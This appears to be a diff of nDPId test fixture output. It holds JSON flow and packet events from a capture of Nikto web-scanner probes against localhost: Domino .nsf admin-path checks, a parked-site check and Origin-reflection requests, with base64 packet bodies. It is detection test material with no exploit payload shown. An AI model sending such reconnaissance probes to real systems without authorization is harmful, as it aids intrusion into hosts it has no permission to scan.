-00868{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276742,"flow_last_seen":1576420276742,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"ts_msec":1576420276742,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49650,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/domcfg.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}}
+01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276742,"flow_last_seen":1576420276742,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"ts_msec":1576420276742,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49650,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/domcfg.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276743,"flow_last_seen":1576420276743,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420276743,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49652,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1576420276743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420276743,"pkt":"AAAAAAAAAAAAAAAACABFAADIxjhAAEAGdfV\/AAABfwAAAcH0H5Bv5P4Yg+7934AYAED+vAAAAQEICp1m+y+dZvsvR0VUIC9hZG1pbi5uc2YgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OkRvbWlubyBkZXRlY3Rpb24pDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276743,"flow_last_seen":1576420276743,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420276743,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49652,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}}
+01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276743,"flow_last_seen":1576420276743,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420276743,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49652,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276744,"flow_last_seen":1576420276744,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"ts_msec":1576420276744,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49654,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1576420276744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"ts_msec":1576420276744,"pkt":"AAAAAAAAAAAAAAAACABFAADJ7atAAEAGToF\/AAABfwAAAcH2H5DjmNWMPF0CB4AYAED+vQAAAQEICp1m+zCdZvswR0VUIC9hZG1pbjQubnNmIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEb21pbm8gZGV0ZWN0aW9uKQ0KDQo="}
-00868{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276744,"flow_last_seen":1576420276744,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"ts_msec":1576420276744,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49654,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin4.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}}
+01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276744,"flow_last_seen":1576420276744,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"ts_msec":1576420276744,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49654,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin4.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276745,"flow_last_seen":1576420276745,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"ts_msec":1576420276745,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49656,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1576420276745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"ts_msec":1576420276745,"pkt":"AAAAAAAAAAAAAAAACABFAADJnTFAAEAGnvt\/AAABfwAAAcH4H5DLFKUODsXYX4AYAED+vQAAAQEICp1m+zGdZvsxR0VUIC9hZG1pbjUubnNmIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEb21pbm8gZGV0ZWN0aW9uKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00868{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276745,"flow_last_seen":1576420276745,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"ts_msec":1576420276745,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49656,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin5.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}}
+01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276745,"flow_last_seen":1576420276745,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"ts_msec":1576420276745,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49656,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin5.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276747,"flow_last_seen":1576420276747,"flow_idle_time":7440000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":151,"midstream":1,"ts_msec":1576420276747,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49658,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1576420276747,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":217,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":217,"pkt_l4_len":183,"ts_msec":1576420276747,"pkt":"AAAAAAAAAAAAAAAACABFAADL46dAAEAGWIN\/AAABfwAAAcH6H5C6Q9uIEYxnOoAYAED+vwAAAQEICp1m+zOdZvsyR0VUIC93ZWJhZG1pbi5uc2YgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEb21pbm8gZGV0ZWN0aW9uKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276747,"flow_last_seen":1576420276747,"flow_idle_time":7440000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":151,"midstream":1,"ts_msec":1576420276747,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49658,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/webadmin.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}}
+01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276747,"flow_last_seen":1576420276747,"flow_idle_time":7440000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":151,"midstream":1,"ts_msec":1576420276747,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49658,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/webadmin.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276749,"flow_last_seen":1576420276749,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"ts_msec":1576420276749,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49660,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1576420276749,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":220,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":220,"pkt_l4_len":186,"ts_msec":1576420276749,"pkt":"AAAAAAAAAAAAAAAACABFAADONl9AAEAGBcl\/AAABfwAAAcH8H5Dz0w5\/kxB3k4AYAED+wgAAAQEICp1m+zWdZvs1R0VUIC9ub25leGlzdGVudC5uc2YgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEb21pbm8gZGV0ZWN0aW9uKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276749,"flow_last_seen":1576420276749,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"ts_msec":1576420276749,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49660,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/nonexistent.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276749,"flow_last_seen":1576420276749,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"ts_msec":1576420276749,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49660,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/nonexistent.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":60,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276751,"flow_last_seen":1576420276751,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420276751,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49662,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00657{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1576420276751,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"ts_msec":1576420276751,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/ubFAAEAGgoV\/AAABfwAAAcH+H5C5FIGNENlwioAYAED+swAAAQEICp1m+zedZvs2R0VUIC8gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpwYXJrZWQgZGV0ZWN0aW9uKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276751,"flow_last_seen":1576420276751,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420276751,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49662,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:parked detection)"}}
+01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276751,"flow_last_seen":1576420276751,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420276751,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49662,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:parked detection)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276754,"flow_last_seen":1576420276754,"flow_idle_time":7440000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"ts_msec":1576420276754,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49664,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00693{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1576420276754,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"ts_msec":1576420276754,"pkt":"AAAAAAAAAAAAAAAACABFAADbnMVAAEAGn1V\/AAABfwAAAcIAH5C\/caTogsAMB4AYAED+zwAAAQEICp1m+zqdZvs5R0VUIC8gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpvcmlnaW5fcmVmbGVjdGlvbikNCk9yaWdpbjogbmlrdG8uZXhhbXBsZS5jb20NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276754,"flow_last_seen":1576420276754,"flow_idle_time":7440000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"ts_msec":1576420276754,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49664,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:origin_reflection)"}}
+01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276754,"flow_last_seen":1576420276754,"flow_idle_time":7440000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"ts_msec":1576420276754,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49664,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:origin_reflection)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":62,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276756,"flow_last_seen":1576420276756,"flow_idle_time":7440000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":162,"midstream":1,"ts_msec":1576420276756,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49666,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00684{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1576420276756,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"ts_msec":1576420276756,"pkt":"AAAAAAAAAAAAAAAACABFAADW2EVAAEAGY9p\/AAABfwAAAcICH5Ck9+BnopzEpIAYAED+ygAAAQEICp1m+zydZvs8R0VUIC8gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpvcmlnaW5fcmVmbGVjdGlvbikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KT3JpZ2luOiAuZXhhbXBsZS5jb20NCg0K"}
